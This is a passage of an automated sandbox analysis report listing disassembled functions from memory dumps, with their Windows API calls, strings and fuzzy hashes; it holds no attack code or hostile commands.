Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: memset
String ID: ~qTm
API String ID: 2221118986-306417505
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: 3a0787111feb536fabe5437e09832734abf80c8ea7e92fc5a9990c7790241397
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: 34B1D572E0420A8FCB18CF68CC916ADBBB6FF94310F194279C549DB785D730A989CB90

Function 6D5B50C7 Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 280COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6D5B8E18
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6D5B925C

Strings

~qTm, xrefs: 6D5B56C7, 6D5B9459, 6D5B5703, 6D5B9269, 6D5B5740, 6D5B921F, 6D5B948F

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: memset
String ID: ~qTm
API String ID: 2221118986-306417505
Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction ID: b51813356218ab9d157d312fa59338bcaf7664e5d3f49bc7b0938c173693a270
Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction Fuzzy Hash: 2EA1E772E002178FCB18CE68CC917A9B7B6FF95314F1942B9C949DB745D730A989CB90

Function 6D5AB910 Relevance: 9.1, APIs: 6, Instructions: 146nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 6D559B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6D5AB92D), ref: 6D559BC8
Part of subcall function 6D559B80: __Init_thread_footer.LIBCMT ref: 6D559BDB

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6D5503D4,?), ref: 6D5AB955
NtQueryVirtualMemory.NTDLL ref: 6D5AB9A5
NtQueryVirtualMemory.NTDLL ref: 6D5ABA20
RtlNtStatusToDosError.NTDLL ref: 6D5ABA7B
RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6D5ABA81
GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6D5ABA86

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
String ID:
API String ID: 1753913139-0
Opcode ID: 222a47cc7815849fbbb2cd67c8066463cf589ce346784dc2fb793e36b2b342a1
Instruction ID: 106a8cf92839e09202520b3bbeebef1155bd3ff298bcab855befa2a716afcf12
Opcode Fuzzy Hash: 222a47cc7815849fbbb2cd67c8066463cf589ce346784dc2fb793e36b2b342a1
Instruction Fuzzy Hash: 6C515E71E0522DDFDF18DEA8D890AEDBBB6AF88314F194129E905B7604DB30AD41CBD1

Function 6D592C10 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6D592C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6D592E2D

Part of subcall function 6D5581B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6D5581DE

Strings

expected a Time entry, xrefs: 6D592E36
(root), xrefs: 6D59354F
ProfileBuffer parse error: %s, xrefs: 6D592E3B

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: __acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 3601557028-4149320968
Opcode ID: af071a89807f57457456a91f4e915193cf1bc703f4322c63df6b0a05e0c94f40
Instruction ID: 84453be54f4fe4a26d85b2e21583bbc02214d6fe5f6574a0284eaca527828200
Opcode Fuzzy Hash: af071a89807f57457456a91f4e915193cf1bc703f4322c63df6b0a05e0c94f40
Instruction Fuzzy Hash: 6191A0B06087818FDB28CF24C49066EB7E1EFC9358F518D1DE59A8BA51EB30D946CB52

Function 61EAF900 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 61EAF94F
UnhandledExceptionFilter.KERNEL32 ref: 61EAF95F
GetCurrentProcess.KERNEL32 ref: 61EAF968
TerminateProcess.KERNEL32 ref: 61EAF979
abort.MSVCRT ref: 61EAF982

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
String ID:
API String ID: 520269711-0
Opcode ID: a4a9847f77e74dada988f497729c1a98e5ce87648e4cbf1531909a786ce77a21
Instruction ID: c24ac7f06ebf37709200600ee493e26a75483ae19b01d267103323a56ae8c6ad
Opcode Fuzzy Hash: a4a9847f77e74dada988f497729c1a98e5ce87648e4cbf1531909a786ce77a21
Instruction Fuzzy Hash: A911C0B5A14A04CFDB00EFB9D64861EBBF0EB5A304F548929E998CB311E774D9848F52

Function 6D585190 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 331COMMON

Download Yara Rule

APIs

Part of subcall function 6D57AB89: EnterCriticalSection.KERNEL32(6D5CE370,?,?,?,6D5434DE,6D5CF6CC,?,?,?,?,?,?,?,6D543284), ref: 6D57AB94
Part of subcall function 6D57AB89: LeaveCriticalSection.KERNEL32(6D5CE370,?,6D5434DE,6D5CF6CC,?,?,?,?,?,?,?,6D543284,?,?,6D5656F6), ref: 6D57ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6D5856C3
__Init_thread_footer.LIBCMT ref: 6D5856E0

Strings

MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 6D5856BE

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CriticalSection$EnterInit_thread_footerLeavegetenv
String ID: MOZ_PROFILER_RECORD_OVERHEADS
API String ID: 3682119399-345010206
Opcode ID: 957ea5a59f69d8f03057b2237d14aa93b89540765f18cf6a39c27200104c0439
Instruction ID: 20a3126ae07cb574d0129e94effe4b64c8a7ae4b8d7f41464f4ab8bd5029abc6
Opcode Fuzzy Hash: 957ea5a59f69d8f03057b2237d14aa93b89540765f18cf6a39c27200104c0439
Instruction Fuzzy Hash: 07E16075918F458AC717CF348860267B7B6BF9B380F119B1EE8AF6A952DF30E4468701

Function 6D5AB700 Relevance: 4.5, APIs: 3, Instructions: 41nativeCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL ref: 6D5AB720
RtlNtStatusToDosError.NTDLL ref: 6D5AB75A
RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6D57FE3F,00000000,00000000,?,?,00000000,?,6D57FE3F), ref: 6D5AB760

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Error$LastMemoryQueryStatusVirtualWin32
String ID:
API String ID: 304294125-0
Opcode ID: b75cf66001c0e3895f5a1ee36677820d474e227bb0890d9cae3081074b9a2718
Instruction ID: bf98a2750ec9a46f84291a961f16dc9485f243e9dead7ac95e202af584aad768
Opcode Fuzzy Hash: b75cf66001c0e3895f5a1ee36677820d474e227bb0890d9cae3081074b9a2718
Instruction Fuzzy Hash: 2DF022B0A0420DAEEF09AAA0CC80BFF73BC9B44319F044129E215754C0DBB499C8C6A1

Function 6D5AB8C0 Relevance: 3.1, APIs: 2, Instructions: 118nativeCOMMON

Download Yara Rule

APIs

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6D5503D4,?), ref: 6D5AB955
NtQueryVirtualMemory.NTDLL ref: 6D5AB9A5

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: MemoryQueryVirtualrand_s
String ID:
API String ID: 1889792194-0
Opcode ID: 91d0618a739c841393b160b8849370963b37659cefe2aae9d89596d4435ce99d
Instruction ID: 2fa5662d4cf728e436aca5f8ae21b8189b58eef66ef202b3bfaa6cfba900a75d
Opcode Fuzzy Hash: 91d0618a739c841393b160b8849370963b37659cefe2aae9d89596d4435ce99d
Instruction Fuzzy Hash: 70418271E0021D9FDF18DFA8D890AEEBBB6EF88354F25812AE505A7704DB319D458BD0

Function 61E2D68C Relevance: 1.3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

Strings

bua, xrefs: 61E2D6C4

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID:
String ID: bua
API String ID: 0-3993766197
Opcode ID: 633315b2ebd987899b0574c5a9c2535cb517164b27f88ba4281f08561b9dd3a8
Instruction ID: 2dbdb228c3cab7288b2b063f09620b15a0131b4afe136593b5dc23e7c01abf69
Opcode Fuzzy Hash: 633315b2ebd987899b0574c5a9c2535cb517164b27f88ba4281f08561b9dd3a8
Instruction Fuzzy Hash: BF112A74A0434A8FCB04CF6DC5C058ABBE4FF88265F248529ED48CB301D374E991CB91

Function 61E2D9B0 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37ab0d498e6869f1248f18525f82ea8c3addd781597051de19eda25eeb30940a
Instruction ID: 382c8684cf9a3560b476f3c0be3439e748f519b75ac4ebfb263bed86336ac9cf
Opcode Fuzzy Hash: 37ab0d498e6869f1248f18525f82ea8c3addd781597051de19eda25eeb30940a
Instruction Fuzzy Hash: 1A319EB8508755DBDB04DF58C4A06AABBF0FF89324F24C95EEAA84B351D334C451CB42

Function 61E2D781 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97cbfa6a907e55dae8401866b1d15889492c98cb2e246ce72649cc570ac47a2c
Instruction ID: 3be14e853f6d6f7a8a57e59baf3aa0a0bffb859339050ea86f3e3846f1c49e98
Opcode Fuzzy Hash: 97cbfa6a907e55dae8401866b1d15889492c98cb2e246ce72649cc570ac47a2c
Instruction Fuzzy Hash: 80012878A046559FCB00DFA9C4D095EBBF5FF89724B24C46AEA488B314C738E851CB92

Function 61E0B431 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba9cc90e5a21082ad6c2295b21ce38250c8b9c469be8e37a4c4f460e4ebd293f
Instruction ID: f77352582697cf63471e0c4c8f40e3a4f494cd20e5c99f7e715a2ca9bff404d5
Opcode Fuzzy Hash: ba9cc90e5a21082ad6c2295b21ce38250c8b9c469be8e37a4c4f460e4ebd293f
Instruction Fuzzy Hash: 4C01F93A904650CFC7009F65C4C0699BBB5FF85319F19C16ADC584F346D734D592CB91

Function 61E2D714 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0c3ebf914bd4d94a51e339c97bb43ea5b9a0e5b7f07c667420d66bd9099e7be
Instruction ID: 23c8173731f4f8750f7e82a0d5cf473f1c368e3d07a63e1643a5bca77f02800b
Opcode Fuzzy Hash: e0c3ebf914bd4d94a51e339c97bb43ea5b9a0e5b7f07c667420d66bd9099e7be
Instruction Fuzzy Hash: 18014B74A003469BD704DF6AC4C4A4AFBB4FF88368F14C669D8088B301D374E995CBD0

Function 61E2D5E6 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 603a9ca93cbafb1f4181249a4d705fd8964dc025393484f8e9e5c12118581de5
Instruction ID: 683273e64459584920a51cd19a7e4d80a31ac76df9d38907cb404440e2cf26f0
Opcode Fuzzy Hash: 603a9ca93cbafb1f4181249a4d705fd8964dc025393484f8e9e5c12118581de5
Instruction Fuzzy Hash: BDF05E79A0020A9FCB00DF69D9C088EB7F9FF89224B24C065ED089B305D334E952CF91

Function 61E2D595 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fec887b937182efdeb275cf1860c59da708b12e60ecbd0d81ba91b53eac5727a
Instruction ID: 44e553df0f6153727c0ccd70e02d170a2b8fbf64feb92f11989a6743949971bc
Opcode Fuzzy Hash: fec887b937182efdeb275cf1860c59da708b12e60ecbd0d81ba91b53eac5727a
Instruction Fuzzy Hash: 64F08934604619DBCB00EF99EDC489EBBB4FF49264F10C495ED948B354DB30D86587D1

Function 61E1307A Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14736fa9179efb67357d4d22b433410e97ebfd633caaa68a2b1c40438b902975
Instruction ID: 20361dabe9e5e624aead0c2cbcda463e1dc5d30ecc087adce6a46ccbc9e5f0dc
Opcode Fuzzy Hash: 14736fa9179efb67357d4d22b433410e97ebfd633caaa68a2b1c40438b902975
Instruction Fuzzy Hash: 01F01C310186858BD7098B689466BA0BFE4AB02328F28C7F9E86D0F7D7C67195C4C790

Function 61E158CA Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fb0f00a4b6ce43e1eafe55f13756f77eaeb3198e66c972334d9a781409f15c7
Instruction ID: 77dbb67e5b13935fb998f7bdeac757b62f4bcf2f309577294fbba61f324934a3
Opcode Fuzzy Hash: 6fb0f00a4b6ce43e1eafe55f13756f77eaeb3198e66c972334d9a781409f15c7
Instruction Fuzzy Hash: 6CE0EC363493485FFB40C9AAADC0A66B79AEB8D12CB24C236ED188B309D522D85146A0

Function 61E2D945 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6dac371d744d1f4a74433f500022962c81eca0c7d3a4d374c1a06fb4a0a0243
Instruction ID: 49fe5c7db6ee1c100769216236de79f0150f8c1617bfc082eb282041d978b41e
Opcode Fuzzy Hash: f6dac371d744d1f4a74433f500022962c81eca0c7d3a4d374c1a06fb4a0a0243
Instruction Fuzzy Hash: A4F04EB9A4535D9FDB00CF0AD8C1ADABBA8FB0C260F94811AFE1857341C274A9508BE1

